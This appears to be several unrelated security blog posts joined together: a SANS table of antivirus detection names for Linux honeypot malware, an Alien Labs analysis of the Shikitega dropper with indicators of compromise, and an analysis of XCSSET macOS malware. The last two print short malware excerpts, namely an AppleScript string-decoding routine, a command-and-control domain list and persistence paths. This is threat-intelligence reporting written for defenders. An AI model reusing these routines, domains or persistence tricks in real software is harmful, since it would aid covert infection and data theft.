trojan.shell/linux’, ‘trojan.shell/malkey’, ‘trojan.linux/bruteforce’, ‘trojan.linux/shell’, ‘trojan.linux/bash’, ‘trojan.linux/sshbru’, ‘trojan.linux’

BV:Downloader-AAN [Drp]

185

downloader.linux’, ‘trojan.linux/shell’, ‘downloader.bash/linux’, ‘downloader.bash/miraia’, ‘downloader.linux/bash’, ‘downloader.linux/shell’

BV:Downloader-AEH [Drp]

146

‘downloader.miraia/bash’, ‘trojan.linux/mirai’, ‘downloader.linux’, ‘downloader.gen2’, ‘downloader.bash/linux’, ‘downloader.’, ‘downloader.shell’, ‘downloader.bash/miraia’

BV:Agent-BAP [Trj]

97

‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’

BV:Downloader-II [Trj]

93

‘trojan.shell/vsntcg22’, ‘downloader.’, ‘downloader.jvhi/shell’, ‘downloader.shell’, ‘downloader.shell/linux’

BV:Downloader-OJ [Drp]

78

‘trojan.shell’, ‘downloader.shell’, ‘trojan.shell/gen2’

ELF:Mirai-BOD [Trj]

25

‘trojan.mirai/linux’, ‘trojan.linux/mirai’

ELF:Xorddos-AB [Trj]

23

‘trojan.linux/xorddos’

BV:Downloader-APV [Drp]

19

‘downloader.bash/miraib’, ‘downloader.miraib/bash’

ELF:Miner-KC [Trj]

19

‘trojan.linux’, ‘trojan.linux/uselvhs22’, ‘trojan.linux/multiverze’, ‘trojan.linux/tygpz’

BV:Downloader-APK [Drp]

17

‘downloader.bash/miraib’, ‘trojan.linux/shell’, ‘downloader.shell/bashdlod’, ‘downloader.miraib/bash’

ELF:BitCoinMiner-HF [Trj]

9

‘miner.linux/camelot’

ELF:Mirai-ADP [Trj]

9

‘trojan.mirai/linux’, ‘trojan.linux/mirai’

ELF:Mirai-AHC [Trj]

5

‘trojan.linux/mirai’

Perl:IRCBot-AD [Trj]

4

‘ircbot/perl’

Perl:IRCBot-D [Trj]

4

‘trojan.perl/shellbot’

ELF:Mirai-ARL [Trj]

4

‘trojan.linux/gafgyt’

ELF:Mirai-BWY [Trj]

4

‘trojan.mirai/linux’

BV:Downloader-AMZ [Drp]

4

‘trojan.shell/smlbr’, ‘trojan.smlbr/shell’

ELF:Mirai-AAJ [Trj]

3

‘trojan.mirai/linux’

Perl:Shellbot-O [Trj]

2

‘trojan.perl/shellbot’

ELF:Mirai-BXS [Trj]

2

‘trojan.mirai/linux’

ELF:MiraiDownloader-MX [Trj]

1

‘trojan.linux/mirai’

ELF:Goldfishgang-A [Bot]

1

‘trojan.mirai/linux’

ELF:Mirai-APD [Trj]

1

‘trojan.mirai/linux’

ELF:MiraiDownloader-MR [Drp]

1

‘downloader.linux/mirai’

Avast and AVG have the same results and numbers, although this is likely due to Avast acquiring AVG in 2016 [6].

GData Result

 Count

 VirusTotal Suggested Threats

Trojan.Shell.Agent.V

452

‘trojan.shell/linux’, ‘trojan.shell/malkey’

Trojan.Shell.Agent.U

100

‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’

Script.Trojan.Agent.Q2DN10

73

‘downloader.’, ‘downloader.shell’, ‘downloader.shell/linux’

Trojan.GenericKD.39794855

56

‘trojan.shell’

Trojan.GenericKD.50084125

32

‘trojan.’, ‘trojan.linux/bruteforce’, ‘trojan.linux/shell’, ‘trojan.linux/sshbru’, ‘trojan.linux’

Linux.Trojan.Mirai.B

29

‘trojan.mirai/linux’, ‘trojan.linux/mirai’

Linux.Application.CoinMiner.AH (2x)

20

‘trojan.linux/shell’, ‘trojan.linux/bash’

Script.Trojan.Agent.SLJ1UA

20

‘trojan.shell’, ‘trojan.shell/gen2’

Trojan.Linux.GenericKD.39722060

15

‘trojan.linux/multiverze’, ‘trojan.linux/tygpz’

Trojan.Downloader.JVHI

13

‘downloader.jvhi/shell’

Trojan.Linux.Generic.208033

12

‘trojan.linux/xorddos’

Generic.Bash.MiraiA.30F5F415

11

‘downloader.bash/miraia’

Trojan.Linux.GenericA.73252

11

‘trojan.linux/xorddos’

Generic.Bash.MiraiB.CB1F6D93

10

‘downloader.miraib/bash’

Script.Trojan.Agent.Z0E85G

10

‘downloader.shell/bashdlod’, ‘trojan.linux/shell’

Generic.Bash.MiraiA.1042638E

9

‘downloader.miraia/bash’

Trojan.Linux.Generic.261801

8

‘trojan.linux/shell’

Generic.Bash.MiraiA.FC226613

8

‘downloader.bash/linux’

Trojan.Linux.GenericKD.40003689

8

‘trojan.linux’, ‘trojan.linux/uselvhs22’

Generic.Bash.MiraiA.37E69EBB

7

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9FE00F4A

7

‘downloader.bash/miraia’

Generic.Bash.MiraiA.F71C9D36

7

‘downloader.bash/miraia’

Generic.Bash.MiraiB.43209CEF

7

‘downloader.miraib/bash’

Generic.Bash.MiraiA.C840B7CF

6

‘downloader.bash/miraia’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.B7AF6546

6

‘downloader.bash/miraia’

Generic.Bash.MiraiA.76F02707

6

‘downloader.bash/miraia’

Trojan.GenericKD.61105047

6

‘trojan.linux/shell’

Trojan.Linux.Agent.IOS

5

‘trojan.linux/mirai’

Backdoor.Perl.Shellbot.F

5

‘trojan.perl/shellbot’

Generic.Bash.MiraiA.F31D7395

5

‘downloader.bash/miraia’

Trojan.GenericKD.50646874

5

‘trojan.’

Trojan.Linux.GenericKD.49342126

5

‘trojan.linux/mirai’

Generic.Bash.MiraiA.53DA044C

5

‘downloader.bash/miraia’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.CDE0B287

5

‘downloader.bash/linux’

Generic.Bash.MiraiA.5A5455F1

5

‘downloader.bash/miraia’

Trojan.GenericKD.46067161

4

‘trojan.linux’

Trojan.GenericKD.46077164

4

‘trojan.linux/shell’

Trojan.GenericKD.48821331

4

‘trojan.’

Trojan.GenericKD.39722073

4

‘trojan.linux’

Application.Linux.Generic.9905

4

‘trojan.linux/gafgyt’

Generic.Bash.MiraiA.2B19920F

4

‘downloader.miraia/bash’

Generic.Bash.MiraiA.AB3356B6

4

‘downloader.linux/bash’

Generic.Bash.MiraiA.90D485C3

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.1BB22156

4

‘downloader.bash/miraia’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.77A820C1

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9F225672

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.C00C7246

4

‘downloader.bash/linux’

Generic.Bash.MiraiA.261F2800

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.91B96D6D

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.8525AE6B

4

‘downloader.bash/miraia’

Generic.Bash.MiraiB.81B3B899

4

‘trojan.miraib/bash’

Generic.Bash.MiraiA.42A992E0

4

‘downloader.bash/miraia’, ‘downloader.linux/bash’

Linux.Trojan.Agent.FRYE0V

3

‘trojan.mirai/linux’

Generic.Bash.MiraiB.EB588E65

3

‘downloader.miraib/bash’

Generic.Bash.MiraiA.F4E0D44D

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9FAC84B8

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.42844671

3

‘downloader.bash/miraia’

Trojan.GenericKD.50084126

3

‘trojan.linux/shell’

Linux.Trojan.Mirai.E

3

‘trojan.mirai/linux’

Trojan.Linux.Mirai.GDC

3

‘trojan.linux/mirai’

Generic.Bash.MiraiA.49306ADF

3

‘downloader.linux/bash’

Generic.Bash.MiraiA.F9E49AE2

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.87330CC0

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.A6961F86

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.29E60E32

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.1DCA368B

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.32EA1F82

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.370A6145

3

‘downloader.bash/linux’

Generic.Bash.MiraiA.88F9FED5

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.A6CEE47A

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.6215B474

3

‘downloader.miraia/bash’

Generic.Bash.MiraiA.BF170979

3

‘downloader.linux/bash’, ‘downloader.bash/linux’

Linux.Application.CoinMiner.AH

3

‘trojan.linux/sshbru’

Generic.Bash.MiraiA.8991856A

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.D4BA1004

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.EE96A6CC

3

‘downloader.bash/miraia’

Generic.Bash.MiraiB.C122DEF0

2

‘trojan.miraib/bash’

Linux.Trojan.Agent.21WIPQ

2

‘trojan.linux/mirai’

Script.Trojan.Agent.D34HUR

2

‘downloader.linux’

Backdoor.Perl.Shellbot.B

2

‘trojan.perl/shellbot’

Generic.Bash.MiraiA.19B73922

2

‘downloader.miraia/bash’

Generic.Bash.MiraiA.F9CC4608

2

‘downloader.linux/bash’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.E2FF41E4

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.F384FF05

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.03BF947A

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.D2936D49

2

‘downloader.bash/miraia’

Script.Trojan.Agent.XQDCBP

2

‘downloader.linux/shell’

Trojan.Linux.GenericKD.49319781

2

‘trojan.linux/mirai’

Generic.Bash.MiraiA.AFC860A3

2

‘downloader.bash/miraia’

Linux.Trojan.Agent.71ZXJT

2

‘trojan.linux/mirai’

Generic.Bash.MiraiA.0A4B5647

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.3085EB19

2

‘downloader.bash/linux’

Generic.Bash.MiraiA.C8C8B46F

2

‘downloader.linux/bash’

Generic.Bash.MiraiA.E0206CAA

2

‘downloader.miraia/bash’

Generic.Bash.MiraiA.AFD545E8

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9DFBA98D

2

‘downloader.bash/linux’

Generic.Bash.MiraiA.77508253

2

‘downloader.bash/miraia’

Trojan.Linux.Generic.266531

2

‘trojan.linux/shell’

Generic.Bash.MiraiA.999DC364

2

‘downloader.bash/miraia’

Generic.Bash.MiraiB.C388CEE8

1

‘downloader.miraib/bash’

Trojan.Linux.Generic.258109

1

‘trojan.linux/mirai’

Generic.Bash.MiraiB.9F77C950

1

‘downloader.miraib/bash’

Gen:Variant.Trojan.Linux.Mirai.8

1

‘trojan.mirai/linux’

Trojan.GenericKD.48821326

1

‘trojan.linux’

Trojan.Linux.Generic.207109

1

‘trojan.linux/shell’

Generic.Bash.MiraiA.F7E66D30

1

‘downloader.bash/miraia’

Linux.Trojan.Agent.0JQTA6

1

‘trojan.linux/mirai’

Generic.Bash.MiraiA.6AB1054A

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.E4FF83F6

1

‘downloader.bash/miraia’

Linux.Trojan.Mirai.J

1

‘trojan.mirai/linux’

Generic.Bash.MiraiA.06015B18

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.716695BA

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.CA694A08

1

‘downloader.bash/linux’

Generic.Bash.MiraiA.7D12497D

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.24330190

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.7AD1CA92

1

‘downloader.bash/linux’

Generic.Bash.MiraiA.9A967DD3

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.A3F75002

1

‘downloader.linux/bash’

Generic.Bash.MiraiB.83D16FFF

1

‘downloader.bash/miraib’

Generic.Bash.MiraiA.7176EFCA

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.BBDDAFB3

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9C2BFED6

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.27A5FB7E

1

‘downloader.bash/miraia’

Generic.Bash.MiraiB.A8550CC8

1

‘downloader.bash/miraib’

Script.Trojan.Agent.SSSDZG

1

trojan.shell/smlbr’

 

Microsoft Result

 Count

 VirusTotal Suggested Threats

TrojanDownloader:Linux/Morila!MTB

118

‘trojan.linux/shell’, ‘downloader.bash/linux’, ‘downloader.bash/miraia’, ‘downloader.linux/bash’, ‘downloader.linux/shell’

Backdoor:Linux/IRCbot.YA!MTB

95

‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’

Trojan:Linux/Multiverze

58

‘trojan.linux/uselvhs22’, ‘trojan.linux/mirai’, ‘trojan.linux/tygpz’, ‘trojan.mirai/linux’, ‘trojan.linux/multiverze’

TrojanDownloader:Linux/Morila.B!MTB

57

‘downloader.bash/miraia’, ‘downloader.bash/linux’

TrojanDownloader:Linux/ShWg.YB!MTB

54

‘downloader.bash/miraia’, ‘trojan.linux/shell’, ‘downloader.bash/linux’

Trojan:Script/Wacatac.B!ml

40

‘downloader.bash/miraib’, ‘trojan.miraib/bash’, ‘trojan.mirai/linux’, ‘downloader.miraib/bash’

HackTool:Linux/Sshbru!MTB

26

‘trojan.linux/shell’, ‘trojan.linux’, ‘trojan.linux/sshbru’

DoS:Linux/Xorddos.A

23

‘trojan.linux/xorddos’

Trojan:Linux/CoinMiner!rfn

16

‘trojan.linux/shell’

Trojan:Linux/CoinMiner.N!MTB

9

‘miner.linux/camelot’

HackTool:Linux/Sshbru!rfn

8

‘trojan.linux/shell’, ‘trojan.linux/sshbru’, ‘trojan.linux/bruteforce’

Backdoor:Linux/Mirai.BO!MTB

6

‘trojan.linux/mirai’, ‘linux’

Trojan:Win32/Occamy.CAD

4

‘trojan.linux’

Backdoor:HTML/Derflop.A

4

‘trojan.perl/shellbot’

Backdoor:Linux/Gafgyt.A!MTB

4

‘trojan.linux/gafgyt’

Trojan:Unix/Multiverze

3

‘trojan.linux/shell’

Trojan:Linux/Mirai.AB!MTB

2

‘downloader.bash/miraia’

Trojan:Linux/Downldr.AE!MTB

2

‘downloader.bash/miraia’

Backdoor:Linux/Mirai.AN!xp

1

‘trojan.mirai/linux’

Trojan:Linux/ZkarletFlash

1

‘trojan.mirai/linux’

Backdoor:Linux/Mirai.AW!MTB

1

‘trojan.mirai/linux’

TrojanDownloader:Linux/Mirai.C!MTB

1

‘downloader.linux/mirai’

 

Summarized and detailed hash data can be downloaded from here [7]. 

When using tools like VirusTotal it is important to be aware of name changes over time and that vendors have their own naming schemes. Make sure that you’re using the latest available results and using the “Reanalyse File” option within VirusTotal to update analysis information. 

[1] https://www.virustotal.com
[2] https://isc.sans.edu/honeypot.html
[3] https://github.com/jslagrew/cowrieprocessor/blob/main/submit_vtfiles.py
[4] https://en.wikipedia.org/wiki/Mirai_(malware)
[5] https://exceljet.net/formula/xlookup-latest-by-date
[6] https://www.comparitech.com/antivirus/avast-vs-avg/
[7] https://www.dropbox.com/sh/jswjv5mlvku0ep7/AADm5vyoR8Jwil7_BgqXjz7ra?dl=0

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

malware-red-sphere-open-graph.jpg

Executive summary

AT&T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are running Linux operating systems. Shikitega is delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.

Key takeaways:

The malware downloads and executes the Metasploit’s “Mettle” meterpreter to maximize its control on infected machines.
Shikitega exploits system vulnerabilities to gain high privileges, persist and execute crypto miner.
The malware uses a polymorphic encoder to make it more difficult to detect by anti-virus engines.
Shikitega abuse legitimate cloud services to store some of its command and control servers (C&C).

Shikitega

Figure 1. Shikitega operation process.

Background

With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half year of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. New malwares like BotenaGo and EnemyBot are examples of how malware writers rapidly incorporate  recently discovered vulnerabilities to find new victims and increase their reach.

Shikitega uses an infection chain in multiple layers, where the first one contains only a few hundred bytes, and each module is responsible for a specific task, from downloading and executing Metasploit meterpreter, exploiting Linux vulnerabilities, setting persistence in the infected machine to downloading and executing a cryptominer.

Analysis

The main dropper of the malware is a very small ELF file, where its total size is around only 370 bytes, while its actual code size is around 300 bytes. (figure 2)

Malicious ELF

Figure 2. Malicious ELF file with a total of only 376 bytes.

The malware uses the “Shikata Ga Nai” polymorphic XOR additive feedback encoder, which is one of the most popular encoders used in Metasploit. Using the encoder, the malware runs through several decode loops, where one loop decodes the next layer, until the final shellcode payload is decoded and executed. The encoder stud is generated based on dynamic instruction substitution and dynamic block ordering. In addition, registers are selected dynamically.  Below we can see how the encoder decrypts the first two loops: (figures 3 and 4)

Shikitega decryption

Figure 3. First “Shikata Ga Nai” decryption loop.

Shikata decryption 2

Figure 4. Second “Shikata Ga Nai” decryption loop created by the first one.

After several decryption loops, the final payload shellcode will be decrypted and executed. As the malware does not use any imports, it uses ‘int 0x80’ to execute the appropriate syscall. As the main dropper code is very small, the malware will download and execute additional commands from its command and control by calling 102 syscall (sys_socketcall). (Figure 5)

Interrupts

Figure 5. Calling system functions using interrupts

The C&C will respond with additional shell commands to execute, as seen in the packet capture in figure 6. The first bytes marked in blue are the shell commands that the malware will execute.

CnC commands

Figure 6. Additional commands received from C&C.

The received command will download additional files from the server that won’t be stored in the hard drive, but rather will be executed from memory only. (Figure 7)

Shikitega shell code

Figure 7. Executes additional shell code received from C&C.

In other malware versions, it will use the “execve” syscall to execute ‘/bin/sh’ with command received from the C&C. (figure 8)

Syscall

Figure 8. Executing shell commands by using syscall_execve.

The malware downloads and executes ‘Mettle’, a Metasploit meterpreter that allows the attacker to use a wide range of attacks from webcam control, sniffer, multiple reverse shells (tcp/http..), process control, execute shell commands and more. 

In addition the malware will use wget to download and execute the next stage dropper.

Next stage dropper

The next downloaded and executed file is an additional small ELF file (around 1kb) encoded with the “Shikata Ga Nai” encoder. The malware decrypts a shell command that will be executed by calling syscall_execve with ‘/bin/sh” as a parameter with the decrypted shell. (Figure 9)

decrypt 2

Figure 9. Second stage dropper decrypts and executes shell commands.

The executed shell command will download and execute additional files. To execute the next and last stage dropper, it will exploit two linux vulnerabilities to leverage privileges – CVE-2021-4034 and CVE-2021-3493 (figure 10 and 11).

exploit linux vuln

Figure 10. Exploiting Linux vulnerability CVE-2021-3493.

exploit second linux vuln

Figure 11. Exploiting CVE-2021-4034 vulnerability.

The malware will leverage the exploit to download and execute the final stage with root privileges – persistence and cryptominer payload.

Persistence

To achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting 4 crontabs, two for the current logged in user and the other two for the user root. It will first check if the crontab command exists on the machine, and if not, the malware will install it and start the crontab service.

To make sure only one instance is running, it will use the flock command with a lock file “/var/tmp/vm.lock”.

flock command

Figure 12. Adding root crontab to execute the final payload.

Below is the list of downloaded and executed script to achieve persistence:

script name

details

unix.sh

Check if “crontab” commands exist in the system, if not install it and start the crontab service.

brict.sh

Adds crontab for current user to execute cryptominer.

politrict.sh

Adds root crontab to execute cryptominer.

truct.sh

Adds crontab for current user to download cryptominer and config from C&C.

restrict.sh

Adds root crontab to download cryptominer and config from C&C.

 

As the malware persists with crontabs, it will delete all downloaded files from the system to hide its presence.

Cryptominer payload

The malware downloads and executes XMRig miner, a popular miner for the Monero cryptocurrency. It will also set a crontab to download and execute the crypto miner and config from the C&C as mentioned in the persistence part above.

XMRig

Figure 13. XMRig miner is downloaded and executed on an infected machine.

Command and control

Shikitega uses cloud solutions to host some of its command and control servers (C&C) as shown by OTX in figure 14. As the malware in some cases contacts the command and control server using directly the IP without domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time.

CnC on legit host

Figure 14. Command and control server hosted on a legitimate cloud hosting service.

Recommended actions

Keep software up to date with security updates.
Install Antivirus and/or EDR in all endpoints.
Use a backup system to backup server files.

Conclusion

Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection. Shiketega malware is delivered in a sophisticated way, it uses a polymorphic encoder, and it gradually delivers its payload where each step reveals only part of the total payload. In addition, the malware abuses known hosting services to host its command and control servers. Stay safe!

Associated Indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the report.

TYPE

INDICATOR

DESCRIPTION

DOMAIN

dash[.]cloudflare.ovh

Command and control

DOMAIN

main[.]cloudfronts.net

Command and control

SHA256

b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331

Malware hash

SHA256

0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed

Malware hash

SHA256

f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb

Malware hash

SHA256

8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732

Malware hash

SHA256

d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374

Malware hash

SHA256

fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765

Malware hash

SHA256

e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d

Malware hash

SHA256

cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d

Malware hash

SHA256

d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8

Malware hash

SHA256

29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8

Malware hash

SHA256

4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7

Malware hash

SHA256

130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5

Malware hash

SHA256

3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098

Malware hash

SHA256

6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275

Malware hash

SHA256

7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad

Malware hash

SHA256

2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab

Malware hash CVE-2021-3493

SHA256

4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f

Malware hash CVE-2021-4034

SHA256

e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4

Malware hash

SHA256

64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4

Malware shell script

SHA256

623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955

Malware shell script

SHA256

59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af

Malware shell script

SHA256

9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338

Malware shell script

SHA256

05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464

Malware shell script

SHA256

ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d

Malware hash

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0002: Execution

T1059: Command and Scripting Interpreter
T1569: System Service

T1569.002: Service Execution

TA0003: Persistence

T1543: Create or Modify System Process

TA0005: Defense Evasion

T1027: Obfuscated Files or Information

I recorded a video for yesterday’s diary entry James Webb JPEG With Malware.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

20220902-204822.png

On Wednesday’s stormcast, Johannes talked about a JPEG picture (coming from the Jales Webb telescope) that malware authors had laced with malware.

Threat actors behind the XCSSET malware have been relatively quiet since last year. However, new activity beginning around April 2022 and increasing through May to August shows that actors have not only adapted to changes in macOS Monterey, but are preparing for the demise of Python, an integral and essential part of their current toolkit.

In this post, we review changes made to the latest versions of XCSSET and reveal some of the context in which these threat actors operate.

XCSSET Changes in 2022

Since XCSSSET first appeared, the authors have made consistent use of two primary tools to obfuscate both droppers and dropped files: SHC and run-only compiled AppleScripts, respectively.

SHC-compiled shell scripts are opaque to traditional static scanning tools and contain only a few human-readable strings.

As all SHC-compiled binaries, legitimate or malicious, contain these same strings, signature scanners cannot distinguish between them.

SHA1: 127b66afa20a1c42e653ee4f4b64cf1ee3ed637d

Dynamic execution of this recent SHC-compiled XCSSET dropper, currently with 0 detections on VirusTotal despite having been known for 2 months, also reveals that the malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022. These fake apps are invariably dropped in a parent folder created in random locations in the user’s Library folder. When executed, this particular sample writes the fake Notes.app to:

~/Library/Application Scripts/com.apple.CalendarAgent

The updated run-only AppleScripts that XCSSET drops as second-stage payloads use a collection of newly-registered domains:

set domains to {

“superdocs.ru”,

“melindas.ru”,

“kinksdoc.ru”,

“adobefile.ru”,

“gurumades.ru”,

“appledocs.ru”,

“45.82.153.92”,

“gismolow.com”,

“Cosmodron.com”

}

Changes in the replicator.applescript file, which infects users’ Xcode projects with the XCSSET malware, show that both curl’s –max-time value and the script’s phaseName variable have now been randomized, presumably to hamper static detection or hunting rules.

Xcode infection script from 2021 (Left) and 2022 (Right)

The –max-time option is now set to a random value between 5 and 9, while phaseName is chosen from the following list:

“Copy Bundle Frameworks”,

“Compile Binary Libraries”,

“Compile Swift Frameworks”,

“Binary Frameworks Compiler”

In the previous version of XCSSET, the malware created and dropped files for its own caches and control functions in a folder at ~/Library/Caches/GeoServices/. This has been modified slightly to “GitServices”.

Persistence plists are currently chosen from the following list:

com.apple.airplay.plist

com.apple.spx.plist

com.google.keystore.plist

com.google.chrome.plist

and target a file at one of:

~/Library/Caches/GitServices/CloudServiceWorker

~/Library/Caches/GitServices/AppleWebKit

As previously, XCSSET continues to attempt to evade detection by masquerading as either system software or the almost ubiquitous Google and Chrome browser software.

XCSSET’s Updated Fake Notes.app

As noted, XCSSET makes use of a fake Notes.app to hide the primary executable, a.scpt, itself launched by the run-only compiled AppleScript main.scpt when “Notes” is executed via the dropped LaunchAgent.

The SHC-compiled dropper script defines several random paths to use as parent directories for the fake Notes.app.

osacompile -x -e try do shell script “osascript ‘/Users/user1/Library/Application Support/com.apple.spotlight/Notes.app/Contents/Resources/Scripts/a.scpt'” end try -o

The a.scpt remains, in essence, the same as earlier versions except that the encoding handler has changed from one previously shared with OSAMiner.

on xe(_str)

set x to id of _str

repeat with c in x

set contents of c to c – (102 – 2)

end repeat

return string id x

end xe

on xex(_str)

set x to id of _str

repeat with c in x

set contents of c to c – (102 – 1)

end repeat

return string id x

end xex

Malicious Run-Only AppleScripts

Aside from a.scpt, XCSSET makes use of multiple run-only AppleScripts. Although these scripts are written to disk as compiled and run-only, we were able to capture the scripts in plain text on the wire. In the updated version of XCSSET, these continue to target Telegram and other chat apps heavily in use by Chinese users such as WeChat and Tencent’s 360, along with an expanded list of browsers, including Opera, Brave, Edge and other Chromium-based browsers.

Many of the scripts shown above share the same structure and list of handlers but make minor changes to handle the specifics of each target application.

check_loop()

log(message)

runme()

upload(filePath, fileName)

urlencode(theText)

The contacts.applescript has the role of targeting various chat apps from which to steal and exfiltrate data.

Among other tasks, the payloader.applescript checks for AppleBackLightDisplay, presumably to distinguish between laptops and desktops. This info is part of what is exfiltrated, showing that the threat actors are keen to gather very precise hardware profiling information.

Similarly, the threat actors are interested in exactly how up-to-date the victim is with Apple’s XProtect and MRT malware removal tool, presumably all the better to target them with more effective payloads. The listing.applescript script is used for this purpose.

Also of interest is the use of the public service transfer.sh for exfiltrating data files that are too large for the attacker’s server.

XCSSET Changes for Monterey and Python

One of the more interesting things we noted in recent samples of XCSSET is the developer’s awareness of OS versions and the clear intent that the authors are here for the long run.

Right from its initial version, XCSSET made use of python scripts for certain functions, in particular for dropping fake application icons on the Dock. It achieved this by abusing a public Github repo called DockUtil. In the latest version, we also note that XCSSET uses python to parse and steal data from the user’s (legitimate) Notes.app. For this functionality, they use a modified version of a plugin from a legitimate python-based tool called mac_apt used by macOS forensics experts.

mac_apt on Github (left); malware script found in XCSSET (right)

XCSSET’s authors have updated their AppleScripts to account for Apple’s recent removal of python 2. The following image shows how the malware authors updated their safari_remote.applescript for python3 and Monterey 12.3 and above.

Similarly, the comment in edge_remote.applescript shows that the authors are keenly aware that DockUtil and other utilities will need to be replaced in their toolkit in the near future.

XCSSET Threat Actors and Targets

While very little is publicly known about the actors behind XCSSET, their motivations or their exact targets, the actors have engaged with journalists and security researchers at times. The original version of XCCSET, which appeared in August 2020, contained the full names of two individuals. Subsequently, a Twitter account with the name ‘Hans’ briefly became active and sent private messages to a journalist, claiming that he was the real author and not the two individuals whose names appeared in the malware code. The same individual claimed that the targets were “developers from China” and “big gambling business”.

‘Hans’ subsequently disappeared from view, but about a year later another Twitter account in the name of ‘Vlad F’ began reaching out to researchers, complaining that they had been falsely accused of being the actors behind the malware.

While Apple refused to comment on these claims at the time, Vlad F’s Twitter account ceased to respond. Earlier this year, however, Chinese users reported XCSSET infections and attempts to unlock stolen “accounts” from victims in return for “200 USDT” (a so-called “stable” bitcoin belonging to Tether).

Prior to that, researchers had noticed that XCSSET infections were being embedded in a number of Github repositories.

